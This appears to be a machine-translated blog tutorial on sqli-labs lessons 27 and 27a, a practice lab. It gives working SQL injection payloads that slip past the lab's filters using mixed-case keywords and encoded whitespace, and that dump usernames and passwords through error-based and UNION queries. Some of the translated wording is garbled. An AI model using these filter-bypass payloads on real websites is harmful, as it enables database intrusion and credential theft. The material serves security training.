Catalog

recommend ：

One 、（ manual ）SQL Basic steps of injection ：

Two 、Less27（GET-Error based - All your UNION & SELECT belong to us-string single quote）

2.1、 brief introduction ：（ Filter - Error echo - Single quotation marks ）

2.2、 First step ： Injection point test

 2.3、 The second step ： Analysis and filtering

2.4、 The third step ： Determine the number of fields

2.5、 Step four ： Warehouse

2.6、 Step five ： Name of Pop Watch

2.7、 Step six ： Pop field

2.8、 Step seven ： Burst data

3、 ... and 、Less27a（GET-Blind based - All your UNION & SELECT belong to us Double quote ）

3.1、 brief introduction ：（ Filter - Bull's blind note - Double quotes ）

3.2、 characteristic ：

3.3、 Use process ：

recommend ：

【SQL Inject - No echo 】 Bull's blind note ： principle 、 function 、 Use process https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165770191616781818723356%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165770191616781818723356&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125275974-null-null.185^v2^control&utm_term=%E5%B8%83%E5%B0%94&spm=1018.2226.3001.4450

【SQL Inject 】 Digital injection & Character injection https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501

【WAF Bypass 】SQL Inject 、 Upload files 、XSShttps://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450

One 、（ manual ）SQL Basic steps of injection ：

First step ： Injection point test

The second step ： Analyze permissions

The third step ： Determine the number of fields

Step four ： Burst database name

Step five ： Name of Pop Watch

Step six ： Pop field name

Step seven ： Burst data

Two 、Less27（GET-Error based - All your UNION & SELECT belong to us-string single quote）

2.1、 brief introduction ：（ Filter - Error echo - Single quotation marks ）

Request method ：GET

Method ： Filter and replace ： /* , – , # , Space , /、union、select、UNION、SELECT、Union、Select+ Error echo

2.2、 First step ： Injection point test

Input ?id=1

  A single quotation mark is added after it, and an error is found

The description is closed in single quotation marks , That is, character injection

And the error can be used to echo

 2.3、 The second step ： Analysis and filtering

Method 1 ：

Consider replacing the injected statement characters one by one step , Until there is no error （ A waste of time ）

Or replace them all （ If you make a mistake , I don't know where it is filtered ）

---

Method 2 ：

Get the source code for white box audit （ The optimal ）

---

Method 3 ：

eg： Input id=union

Look at the input echo filter statement

---

 

Finally, you can know that the filtered characters are

 /* , – , # , Space , /,/s

union、select、UNION、SELECT、Union、Select

---

Replace spaces ：

%09  TAB key （ level ）

%0a  Create a new line

%0c  A new page

%0d  return function

%0b  TAB key （ vertical ）

%a0  Space

Change the space to ||

---

Comments are filtered out , You can use splicing statements , take 2 The side is closed

---

union and select You can use case obfuscation to bypass , Or double write

2.4、 The third step ： Determine the number of fields

2.5、 Step four ： Warehouse

?id=1'%26%26extractvalue(1, concat(0x7e, database()))%26%26'1

  perhaps

?id=0'unIon%0BSelEcT%0B1,database(),3||'1

 

2.6、 Step five ： Name of Pop Watch

?id=0'%0AunIon%0ASeLeCt%0A1,(SeLeCt%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'),3||'1

 

  perhaps

?id=0'||extractvalue(1,concat(0x7e,(sEleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))||'

 

2.7、 Step six ： Pop field

?id=0'%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b'1'='1

 

perhaps

?id=1'||extractvalue(1,concat(0x7e,(sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='users')))||'

 

2.8、 Step seven ： Burst data

?id=1'||extractvalue(1,concat(0x7e,(sEleCt(substr((group_concat(username,password)),1,32))from(users))))||'

perhaps

 ?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/1,(SeLeCt/*%0a*/group_concat(concat_ws('$',id,username,password))/*%0a*/from/*%0a*/users),3/*%0a*/||/*%0a*/'1'='1

 

3、 ... and 、Less27a（GET-Blind based - All your UNION & SELECT belong to us Double quote ）

3.1、 brief introduction ：（ Filter - Bull's blind note - Double quotes ）

Request method ：GET

Method ： Filter and replace ： /* , – , # , Space , /、union、select、UNION、SELECT、Union、Select+ Bull's blind note

3.2、 characteristic ：

Double quote character Injection , have access to union Joint injection

No error echo （ That is, no error injection updatexml Functions, etc ）

The correct and error pages are different , Boolean blind injection can be carried out , Because he has no error echo

You can also delay blind injection

3.3、 Use process ：

Basically and Less26 Using federated queries

Perform Boolean blind Injection （ Judge ）

?id=0"unIon%0BSelEcT%0B1,database(),"3

……